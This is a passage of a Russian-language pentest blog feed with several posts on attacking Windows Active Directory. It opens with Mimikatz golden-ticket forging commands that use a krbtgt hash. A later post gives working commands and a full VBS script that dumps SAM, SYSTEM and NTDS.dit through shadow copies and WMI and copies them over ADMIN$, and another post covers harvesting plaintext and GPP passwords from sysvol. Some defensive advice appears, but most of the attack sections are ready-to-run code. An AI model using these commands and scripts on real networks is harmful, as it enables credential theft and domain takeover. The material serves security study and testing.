"kerberos::golden /admin:ANYID /domain:TEST.LOCAL /sid:S-1-5-21-3838653977-3010990090-570996099 /krbtgt:C1E209654807223D8CB17376FCB70E53 /ticket:myfile" exit kerberos::golden – вызов функции генерации TGT билета /admin:ANYID – сюда можно писать произвольный идентификатор (будет светиться в журнале безопасности) &amp;nbsp;/domain:TEST.LOCAL – целевой домен &amp;nbsp;/sid:S-1-5-21-3838653977-3010990090-570996099 – идентификатор целевого домена /krbtgt:C1E209654807223D8CB17376FCB70E53 – NTLM-хеш пользователя krbtgt /ticket:myfile – имя файла, в который будет записан новоиспеченный TGT билет После генерации этого файла возвращаемся к доменному компьютеру и подгружаем волшебный "золотой билетик" Kerberos: mimikatz.exe "kerberos::ptt myfile" exit Ну и не стоит забывать, что аутентификация по протоколу Kerberos завязана на использование полных DNS-имен, поэтому голые ip-адреса придется забыть. В готовой сборке Mimikatz владелец золотого TGT билета становится участником следующих групп безопасности: SID 512 - Администраторы домена SID 513 - Пользователи домена SID 518 - Администраторы схемы SID 519 - Администраторы предприятия SID 520 - Владельцы-создатели групповой политики , а также получает маркер доступа встроенной учетной записи администратора системы (SID 500). К сожалению, в реальной жизни этого не всегда хватает. Например, для случаев, когда необходимо аккуратно тыкнуться на определенный ресурс (например, на файловый сервер) без внесения каких-либо изменений в систему. Да-да, смена владельца с последующим сбросом ACL (и последующим ее восстановлением) на киллограмовой папочке только для того, чтобы убедиться в отсутствии файликов с паролями в плейн тексте, изрядно напрягает. В подобных случаях можно собрать свою версию Mimikatz (благо имеются сорцы&amp;nbsp;в свободном доступе с подробным руководством по сборке). Самые же ленивые могут забрать готовую дополненную версию в части генерации TGT билета&amp;nbsp;отсюда (mimi.exe/md5 324ac76502379a869485f7a404dd1570). В ней появились два новых параметра: /usersid – собсно SID пользователя /groupsid – участником какой группы необходимо быть (помимо администраторов домена, предприятий и пр.) Предположим мы хотим получить доступ к каталогу "only_test01", как показано на рисунке выше. Для этого заглядываем в список контроля доступа удаленного ресурса (eq ShareEnum), получаем SID целевой группы (eq PsGetsid) и создаем себе условия легитимного доступа: mimi.exe "kerberos::golden /admin:ANONYMOUS /domain:TEST.LOCAL /sid:S-1-5-21-3838653977-3010990090-570996099 /krbtgt:C1E209654807223D8CB17376FCB70E53 /ticket:myfile2 /usersid:501 /groupsid:1120" exit mimi.exe "kerberos::ptt myfile2" exit И вуаля!11 Как защититься? Согласитесь, с точки зрения форенсики забавная штука получается :)) Отмониторить активность атакующего, суметь отделить ее от активности настоящих легитимных пользователей и сервисных учетных записей при подобных возможностях, будет ох как непросто, если вообще возможно. &amp;nbsp;А вот предотвратить (повторный) несанкционированный доступ можно путем смены пароля пользователю krbtgt. Причем менять пароль необходимо два раза подряд (еще одна тонкая особенность&amp;nbsp;krbtgt), затем передергивать службу KDC и наблюдать как (временно или насовсем) отваливаются сервисы, завязанные на Active Directory… итак до следующего случая компрометации хешика krbtgt :) Удачи!</itunes:summary><itunes:keywords>Active Directory, backdoor, forensic, Golden, Microsoft, Mimikatz, Ticket</itunes:keywords></item><item><title>Windows shadow hack</title><link>http://devteev.blogspot.com/2013/09/windows-shadow-hack.html</link><category>hack</category><category>passwords</category><category>research</category><category>windows</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Wed, 18 Sep 2013 02:10:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-4200451442666358949</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBBCZNLVcL28S5FoERSALAScopWKVNEv3g82yb8TMYgAGd_V_3VVACWdi9CESAD48s-gG-mvuc3bp2_Z-nK38yTZ9IcxJdZzbSio5RHChp_rWkVqtM5KlrFngtxOfchyphenhyphen-K3yuqX3CtIYI/s1600/logo.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBBCZNLVcL28S5FoERSALAScopWKVNEv3g82yb8TMYgAGd_V_3VVACWdi9CESAD48s-gG-mvuc3bp2_Z-nK38yTZ9IcxJdZzbSio5RHChp_rWkVqtM5KlrFngtxOfchyphenhyphen-K3yuqX3CtIYI/s320/logo.jpg" height="256" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
Потихоньку проходят времена, когда можно было беспрепятственно шнырять &lt;a href="http://fgdump.com/fgdump/" target="_blank"&gt;fgdump'ом&lt;/a&gt; по всей сети. Сейчас же на каждой корпоративной рабочей станции установлен грозный антивирус, который палит всякие полезные программки, называя их как-то созвучно со словом "hack". В довесок, наблюдается грустная тенденция по инсталляции аверов для защиты серверов все чаще и чаще :(( ...&lt;br /&gt;
&lt;br /&gt;
Убить всяких касперов по-простому, к сожалению, не всегда удается. Поэтому тру-парни пользуют либо собственные сборки fgdump'ов, перекриптованные собственными пакерами, либо ищут альтернативные пути доступа к хешикам пользователей скомпрометированных систем. Про альтернативные методы дерганья нужных данных как раз и пойдет речь в данной публикации.&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Первое, что приходит в голову - это воспользоваться встроенными механизмами резервного копирования операционной системы вындовс. Для серверов и рабочих станций справедлива следующая команда:&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;ntbackup backup systemstate /F "C:\backup.bkf"&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
и&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;wbadmin start systemstatebackup -backupTarget:D: -quiet&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
(&lt;span style="text-align: justify;"&gt;для более старших осей)&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
В данном случае мы получаем system state, который после переброса на компьютер атакующего, необходимо развернуть в тестовой среде. Затем, для получения доступа к свежей копии продуктивной вражеской системы, можно воспользоваться, например, &lt;a href="http://www.elcomsoft.com/esr.html" target="_blank"&gt;ElcomSoft System Recovery&lt;/a&gt;.&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Я люблю данный способ, потому как он позволяет в спокойной обстановке изучить систему с использованием привычных интерфейсов без страха неожиданно потерять к ним доступ. Это особенно выгодно, когда речь заходит про копию контроллера домена. Однако у данного подхода существует и серьезное ограничение, связанное с размером файла резервной копии. Для небольшого домена размер файла резервной копии может достигать нескольких гигабайт. Поэтому в ситуевине, когда атакующий ограничен шириной канала, такой вариант, увы, не подходит.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Другой альтернативой достижения аналогичных целей является функция "скрытого копирования" (shadow copy), которая впервые появилась в Windows 2003. Для контроллера домена типовая атака состоит из следующих шагов (см. &lt;a href="http://www.room362.com/blog/2013/06/10/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/" target="_blank"&gt;ссылку&lt;/a&gt;):&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
1. Получаем слепок целевой системы&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;b&gt;vssadmin create shadow /for=C:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
2. Копируем необходимые файлы&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;b&gt;copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\ System32\config\SYSTEM system.file&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;b&gt;copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\ NTDS\NTDS.dit ntdsdit.file&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;blockquote class="tr_bq" style="text-align: justify;"&gt;
Прим. Файл "system" хранит в себе syskey, который требуется для доступа к чувствительным данным, содержащимся в файле "ntds.dit". Файл "ntds.dit" - это реплика каталога домена.&lt;/blockquote&gt;
&lt;div style="text-align: justify;"&gt;
3. После перемещения этих двух файлов в собственную среду, можно поколдовать над ними с использованием&lt;a href="http://www.ntdsxtract.com/en/ntdsxtract.html" target="_blank"&gt; NTDSXtract framework&lt;/a&gt;&amp;nbsp;(см. также &lt;a href="http://www.room362.com/blog/2013/06/11/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-2/" target="_blank"&gt;ссылку&lt;/a&gt;).&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
4. Грепаем хешики и запускаем перебор паролей&lt;/div&gt;
&lt;blockquote class="tr_bq" style="text-align: justify;"&gt;
Прим. Стоит помнить, что на случай не брутабельных паролей, атакующего может выручить атака pass-the-hash. Это справедливо и в случае, когда на контроллере домена задействована настройка не хранить lm-хеш после смены пароля пользователем.&lt;/blockquote&gt;
&lt;div style="text-align: justify;"&gt;
С контроллером домена все норм, а вот на рабочих станциях волшебство из командной строки заканчивается. Дело в том, что парни из MS делают все возможное, чтобы максимально разнообразить жизнь суровым сисадминам и тем, кто ими становится после эксплуатации соответствующих уязвимостей на операционных системах, предназначенных для офисного планктона. Ограничивают доступ к системе по RDP в одну сессию, не ставят по умолчанию telnet в последних сборках винды, подсовывают урезанную версию vssadmin, которая не умеет делать новые копии состояния файловой системы. Но выход есть! Все аналогичные действия можно провернуть через WMI.&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")&lt;br /&gt;
Set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")&lt;br /&gt;
errResult = objShadowStorage.Create("C:\", "ClientAccessible", strShadowID)&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
Так был написан наколенный вариант vbs-скрипта для скрытого резервного копирования нужных файлов:&lt;br /&gt;
&lt;br /&gt;
&lt;textarea class="xml" name="code" rows="50"&gt;Dim filescopy,filenames
filescopy = Array("\Windows\System32\config\system","\Windows\System32\config\sam","\Windows\NTDS\ntds.dit")

set fso=CreateObject("Scripting.FileSystemObject")
set objNetwork = CreateObject("WScript.Network")
Set WShell = CreateObject("WScript.Shell")

tmpdir = fso.GetTempName
CurrentDirectory = fso.GetAbsolutePathName(".")

Set objArgs = WScript.Arguments
if WScript.Arguments.Count = 3 then
    WScript.Echo "Server: " &amp; objArgs(0)
    WScript.Echo "User: " &amp; objArgs(1)
    WScript.Echo "Password: " &amp; objArgs(2)
    Set objSWbemLocator = CreateObject("WbemScripting.SWbemLocator")
    Set objWMIService = objSWbemLocator.ConnectServer(objArgs(0), "root\cimv2", objArgs(1), objArgs(2))
    srv = objArgs(0)
else
    WScript.Echo "Server: localhost"
    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    srv = "127.0.0.1"
end if

Set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")
errResult = objShadowStorage.Create("C:\", "ClientAccessible", strShadowID)

Set colItems = objWMIService.ExecQuery("Select DeviceObject from Win32_ShadowCopy where ID='" &amp; strShadowID &amp; "'")
For Each objItem in colItems
 strDeviceObject = objItem.DeviceObject
Next

Set objStartup = objWMIService.Get("Win32_ProcessStartup") 
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = 12
set objProcess=objWMIService.Get("Win32_Process")

errResult = objProcess.Create("cmd /c mkdir %windir%\Temp\" &amp; tmpdir,Null,objConfig,intProcessID)
For Each val In filescopy
 errResult = objProcess.Create("cmd /c copy " &amp; strDeviceObject &amp; val &amp; " %windir%\Temp\" &amp; tmpdir,Null,objConfig,intProcessID)
 Call ProcMon(intProcessID)
Next

if srv = "127.0.0.1" Then
 WShell.run("cmd /c move /Y %windir%\Temp\" &amp; tmpdir &amp; " " &amp; CurrentDirectory &amp; "\127.0.0.1"), 0, true
Else
 WShell.run("cmd /c net use \\" &amp; srv &amp; "\ADMIN$ " &amp; objArgs(2) &amp; " /u:" &amp; objArgs(1) &amp; " &amp;&amp; mkdir " &amp; CurrentDirectory &amp; "\" &amp; srv &amp; " &amp;&amp; copy /Y \\" &amp; srv &amp; "\ADMIN$\Temp\" &amp; tmpdir &amp; "\* " &amp; CurrentDirectory &amp; "\" &amp; srv &amp; "\ &amp;&amp; rmdir /S /Q \\" &amp; srv &amp; "\ADMIN$\Temp\" &amp; tmpdir &amp; " &amp;&amp; net use \\" &amp; srv &amp; "\ADMIN$ /del"), 0, true
End if

Function ProcMon(intProcessID)
    Dim colProcesses, ExitFlag
    Set colProcesses = objWMIService.ExecNotificationQuery("SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'")
    Do Until ExitFlag
 Set objLatestProcess = colProcesses.NextEvent
     If objLatestProcess.TargetInstance.ProcessID = intProcessID Then ExitFlag = true  
    Loop    
End Function
&lt;/textarea&gt;
&lt;br /&gt;
Пример выполнения:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3uB54hyphenhyphenzAmrLepjVDSu8RUlI0fIuR9gkNvRWfR-UU8dSRsA8n_OVH2OgR0h6bRDoWe_XdTrGGXBFWvtWaeSLNIw1RaVWchwLPFxKRuk9By-dZ4c4HAYB_I5l_wOlRxIH3FpXY8LOBx-M/s1600/example.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3uB54hyphenhyphenzAmrLepjVDSu8RUlI0fIuR9gkNvRWfR-UU8dSRsA8n_OVH2OgR0h6bRDoWe_XdTrGGXBFWvtWaeSLNIw1RaVWchwLPFxKRuk9By-dZ4c4HAYB_I5l_wOlRxIH3FpXY8LOBx-M/s400/example.png" height="426" width="500" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
На этом сегодня все. Не попадайтесь!&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBBCZNLVcL28S5FoERSALAScopWKVNEv3g82yb8TMYgAGd_V_3VVACWdi9CESAD48s-gG-mvuc3bp2_Z-nK38yTZ9IcxJdZzbSio5RHChp_rWkVqtM5KlrFngtxOfchyphenhyphen-K3yuqX3CtIYI/s72-c/logo.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>Cт(а)ра(да)ние админов в недрах sysvol</title><link>http://devteev.blogspot.com/2013/09/c-sysvol.html</link><category>hack</category><category>Microsoft</category><category>passwords</category><category>pentest</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Fri, 6 Sep 2013 01:00:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-4181607983698838274</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK_gR_C03U3tuTGs7_BUYPS6YBpKjJIZLnMLqxgLRErKX4W8iYo6zC7_-yu8GX4NoOhZVH34oYmjX4WXYiPgnz-85azboZPYKThgeFH4rInElDp081IfalEf7Ms_JCFXmI9u_bNs1DkmY/s1600/logo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK_gR_C03U3tuTGs7_BUYPS6YBpKjJIZLnMLqxgLRErKX4W8iYo6zC7_-yu8GX4NoOhZVH34oYmjX4WXYiPgnz-85azboZPYKThgeFH4rInElDp081IfalEf7Ms_JCFXmI9u_bNs1DkmY/s640/logo.jpg" width="540" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Когда компания Microsoft реализовала централизованную систему авторизации и явила всему миру Active Directory, каждый уважающий себя системный администратор принялся выдумывать способы максимально простого управления всей инфраструктурой на базе этой балалайки. Одна из задач, которую ставил перед собой админ - сохранить власть над всеми компутерами домена и иметь возможность демонстрировать эту власть не покидая своего отдаленного уютного логова заваленного пивом и снеками. Продвинутым пользователям в свою очередь это очень не нравилось. Ведь не бритый и всегда злой &lt;i&gt;программист&lt;/i&gt;, обладая правами администратора к их системам, мог получить доступ к самой ценной информации, которая только может обрабатываться на корпоративном компьютере - к переписке в icq! Поэтому продвинутые пользователи всячески препятствовали сохранению админом высоких привилегий на своих системах.&lt;/div&gt;
&lt;blockquote class="tr_bq" style="text-align: justify;"&gt;
прим. В то время (начало 2000 года) для многих админов была целая проблема запустить все необходимые программулины с правами непривилегированного юзверя. Потому каждый первый юзверь был локальным администратором на своем компьютере.&lt;/blockquote&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Сопротивление удаленному контролю со стороны продвинутых пользователей на своих рабочих станциях в корне не устраивало властелинов сети. Почесав слегка затылок в каталоге sysvol появляются файлы с расширением "bat" приблизительно следующего содержимого:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;net localgroup administrators "domain\domain admins" /add&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
, которые будучи помещенные в автозагрузку компьютеров через gpo ненадолго выравнивали силы противодействующих сторон.&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Прошло совсем немного времени и администраторы встретились с огромной проблемой - это был локальный администратор на каждом доменном компьютере. Удалить его низя, значит учетка нужная. Кроме того, ей всегда можно воспользоваться в случае, если компутер потеряет домен в силу различных обстоятельств, рассуждали админы. Порассуждали и заб(ы)или.&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Но задвинуть надолго эту проблему в компаниях, где навязывалась "информационная безопасность" с регулярной сменой паролей или наблюдалась текучесть кадров в ит-отделе, не удавалось. А если к этому еще вспомнить насущие проблемы в виде нескольких версий unattended-инсталляций с различными паролями, выявленные случаи смены паролей корпоративными юзверями и несколько версий дефолтов в голове админа.....&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Таким образом, у самых сообразительных админов, которые привыкли решать проблемы топорно в режиме неопределенного времени, среди многочисленных костылей в виде bat-файлов появляется нечто новое в cmd-обертке:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;net user administrator password1&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Задача файла аналогична предыдущему решению - запуститься на всех рабочих станциях домена с правами системы и установить хардкоженный пароль. Разумеется такой способ ротации пароля локального администратора кажется диким, однако ваш покорный слуга даже сегодня встречает подобное творчество в крупных гетерогенных сетях.&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
В то же самое время ребята из компании Microsoft хрустя попкорном с интересом наблюдали за всей этой движухой со стороны. Все понимали, что админы очень &lt;strike&gt;охотно&lt;/strike&gt; активно используют logon/logoff сценарии в домене. Однако, функций командной строки явно не хватало для реализации всех многочисленных идей, которые рождались в светлых головах системных администраторов. Так, мир увидел WSH, который тут же был окучен сисадминами.&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Каталог sysvol запестрил расширениями vbs и js вперемешку с уже историческими костылями командной строки. Новые технологии позволили администраторам "по новому" заняться старыми проблемами, в т.ч. и с пресловутым локальным администратором...&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;strComputer = "."&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Set objUser = GetObject("WinNT://" &amp;amp; strComputer &amp;amp; "/Administrator, user")&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;objUser.SetPassword "password1"&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;objUser.SetInfo&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
На сцене появляются суровые админы, которые считают подобные методы ротации пароля администратора небезопасными. Но шутники корпорации добра предлагают иллюзию безопасности кода сценариев и релизят тулень под названием &lt;a href="http://download.microsoft.com/download/0/0/7/0073477f-bbf9-4510-86f9-ba51282531e3/sce10en.exe" target="_blank"&gt;Script Encoder&lt;/a&gt;, которая "шифрует" содержимое сценариев vbs/js. Администраторы успокаиваются и все счастливы. Особенно счастливы зохеры, которые &lt;a href="http://www.interclasse.com/scripts/decovbe.php" target="_blank"&gt;декодируют содержимое скриптов на раз&lt;/a&gt;.&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Но шутникам из MS этого показалось мало. А потому в windows server 2008 появляется возможность "безопасной" ротации паролей локальных пользователей домена, прям из интерфейса управления групповыми политиками:&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifix56BeaFCIOmSqrwo4yrWz4kowFaYHqEY2z0g1D3baK-W7Rwm1_qcZDr0KuMKh53VZ-N06wOkKHCus3BwaPE12-sFpVNzKqesf6XAPIZyP1VQs5w9Yx04X6D3dlnHeg40mycPEyBm_I/s1600/groups.xml.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="287" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifix56BeaFCIOmSqrwo4yrWz4kowFaYHqEY2z0g1D3baK-W7Rwm1_qcZDr0KuMKh53VZ-N06wOkKHCus3BwaPE12-sFpVNzKqesf6XAPIZyP1VQs5w9Yx04X6D3dlnHeg40mycPEyBm_I/s640/groups.xml.png" width="540" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Админы пользуют, а зохеры тырят group.xml из каталога sysvol и пользуют локальных админов :) Как-то так и живем.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnL5EGOEmc6U2SDpLTxwUzGfsn68Vr-Pqxd8j07SdKlGjBOQlJClblbiO2d9XeCGdYcEfOf4I_LCaubAVjGxFhB3nBHp0okFoGCiFk4MJ4NWIX55YCyCQonbM7aXH7YfY0D8Ehb9McS8o/s1600/gpppassword.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnL5EGOEmc6U2SDpLTxwUzGfsn68Vr-Pqxd8j07SdKlGjBOQlJClblbiO2d9XeCGdYcEfOf4I_LCaubAVjGxFhB3nBHp0okFoGCiFk4MJ4NWIX55YCyCQonbM7aXH7YfY0D8Ehb9McS8o/s400/gpppassword.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
Источник:&amp;nbsp;&lt;a href="http://obscuresecurity.blogspot.ru/2012/05/gpp-password-retrieval-with-powershell.html"&gt;http://obscuresecurity.blogspot.ru/2012/05/gpp-password-retrieval-with-powershell.html&lt;/a&gt;&lt;/div&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="font-weight: normal;"&gt;Эпилог&lt;/span&gt;&lt;/h3&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
В данном рассказе я не хотел кого-то обидеть! И в первую очередь, не хотел обидеть системных администраторов, многие из которых действительно хорошо делают свою работу. Цель публикации в очередной раз обратить внимание администраторов и специалистов по ИБ на то, что хранение паролей в открытом виде опасно! И этим не брезгают пользоваться атакующие. А предлагаемые пути сокрытия пароля от ms при его хранении лишь вызывают широкую улыбку.&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Что же касается локального администратора в доменной инфраструктуре, то в очередной раз хочу обратить внимание уважаемого читателя на следующую публикацию: &lt;a href="http://support.microsoft.com/kb/814777"&gt;http://support.microsoft.com/kb/814777&lt;/a&gt; Отключите локального администратора на компьютерах домена и безопасность вашей сети немного повысится.&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK_gR_C03U3tuTGs7_BUYPS6YBpKjJIZLnMLqxgLRErKX4W8iYo6zC7_-yu8GX4NoOhZVH34oYmjX4WXYiPgnz-85azboZPYKThgeFH4rInElDp081IfalEf7Ms_JCFXmI9u_bNs1DkmY/s72-c/logo.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">13</thr:total></item><item><title>Охота на администраторов сети</title><link>http://devteev.blogspot.com/2013/08/blog-post.html</link><category>exploits</category><category>Microsoft</category><category>pentest</category><category>privacy</category><category>research</category><category>tools</category><category>windows</category><category>тест на проникновение</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Thu, 8 Aug 2013 00:42:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-3677470157813867532</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOiQ-mhvocgGsVkL_hFl8mbwC7tTFi62LAMvTOCD9-0Com4EPNB_CRmTyto7ClC4gZ7dBhRs-8EbF0RSrYq2Fpp3SRb1hb8D2LOj3qUprU-Ual0fMKi11k5OUJC-FjcM8SCGGH8HYzrro/s1600/logo.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOiQ-mhvocgGsVkL_hFl8mbwC7tTFi62LAMvTOCD9-0Com4EPNB_CRmTyto7ClC4gZ7dBhRs-8EbF0RSrYq2Fpp3SRb1hb8D2LOj3qUprU-Ual0fMKi11k5OUJC-FjcM8SCGGH8HYzrro/s320/logo.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
Рабочая станция любого среднестатистического повелителя сети (или повелителя отдельной ее части) является наиболее ценным и лакомым ресурсом для атакующего. Тут вам и резервные копии конфигураций продуктивных систем, и красочная топология сети с указанием наиболее ценных ресурсов, и, разумеется, заветные логины, ключики и пароли. Прям подарочная не зашифрованная коробка, перевязанная бантиком 8)) Если добавить сюда еще и "скромные" разрешающие правила фильтрации трафика на границах сетей с козырных ip адресов админов, тогда можно понять насколько сильно атакующий жаждет заполучить доступ к этим системам. Это отличный плацдарм для планирования и развития атаки!&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Но как же добраться до компутера админа и вместе с тем заполучить ключи от всех дверей? Существует довольно много способов. Об одном из них речь пойдет в данной публикации.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Представьте себе ситуацию, когда большинство попыток реализации атак не увенчались успехом. При этом в распоряжении атакующего оказались лишь несколько тестовых автономных серверов без каких либо ценностей на них (пароли дефолты и т.п.), пускай в т.ч., расположенные в изолированном сегменте за семью файрволами и пятью айпиэсами. Что из этого можно выжать?&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style="text-align: justify;"&gt;Когда речь заходит про удаленный доступ к машинкам на платформе windows, то чаще всего прибегают к встроенному функционалу операционной системы - использованию протокола RDP. А когда возникает потребность в передаче файлов небольшого размера, то разумеется задействуют следующую функцию rdp-клиента:&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
